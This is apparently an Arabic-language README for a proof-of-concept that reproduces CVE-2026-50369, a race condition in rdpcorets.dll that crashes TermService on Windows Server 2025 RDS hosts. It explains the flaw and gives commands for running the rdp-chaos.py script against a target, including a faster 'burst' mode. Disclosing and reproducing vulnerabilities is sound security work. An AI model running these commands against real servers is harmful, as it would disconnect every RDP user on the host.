
مُعيد إنتاج PoC لـ CVE-2026-50369، وهو حالة سباق TOCTOU في rdpcorets.dll على مضيفي جلسات RDS في Windows Server 2025 مما يؤدي إلى DoS في TermService عبر قطع جلسة RDP.
مُعيد إنتاج لحالة سباق TOCTOU في rdpcorets.dll!CRdpPipeGfxPlugin::Enable على مضيفي جلسات RDS في Windows Server 2025.
أبلغتُ عن هذا كـ DoS؛ ويبدو أن مسار الكود يُمكّن أيضًا من EoP بطريقة ما. مُعيد الإنتاج هذا هو PoC لمسار DoS وحده.
يقرأ Enable مؤشر واجهة COM عند this+0x60 مرتين دون مزامنة. تقوم TerminateInstance بمسح الحقل نفسه خارج نطاق القسم الحرج الخاص بها. يُنفَّذ كلاهما بشكل متزامن على مجموعة خيوط NT عبر عناصر عمل وصول وإزالة جهاز PnP. تؤدي القراءة الثانية إلى إلغاء مرجع فارغ → انتهاك الوصول → تعطل TermService → فصل جميع جلسات RDP النشطة.
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3 # or freerdp2-x11
# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt
# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt
# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
--burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030